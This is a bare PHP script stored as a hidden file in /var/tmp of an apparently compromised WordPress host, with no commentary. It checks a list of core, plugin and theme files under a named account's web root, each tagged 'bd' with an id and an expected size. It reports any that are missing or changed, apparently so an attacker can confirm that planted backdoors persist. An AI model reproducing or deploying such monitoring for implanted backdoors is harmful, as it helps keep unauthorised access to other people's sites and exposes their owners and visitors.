File: //var/tmp/.post
<?php $r = '/home/corofmbe/public_html'; $x = ["/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php"=>"bd@@1289740@@11",
"/wp-content/plugins/wordpress-seo/admin/class-yoast-modal.php"=>"bd@@1289966@@79",
"/wp-content/plugins/wordpress-seo/vendor/yoast/license-manager/class-plugin-license-manager.php"=>"bd@@1290011@@13",
"/wp-content/plugins/wordpress-seo/src/schema-templates/address.schema.php"=>"bd@@1290083@@15",
"/wp-content/themes/writee/inc/theme/views/content.php"=>"bd@@1290198@@90",
"/wp-content/plugins/duplicator/views/settings/storage.php"=>"bd@@1290279@@60",
"/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/fields/color_gradient/field.color.gradient.php"=>"bd@@1290413@@968",
"/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/fields/raw/parsedown.raw.php"=>"bd@@1290467@@894",
"/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/validation/no_html/validation.no.html.php"=>"bd@@1290510@@939",
"/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/validation/colorrgba/validation.colorrgba.php"=>"bd@@1290552@@851",
"/wp-content/themes/Avada/woocommerce/compatibility/3.2/single-product/tabs/additional.information.php"=>"bd@@1290694@@1016"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');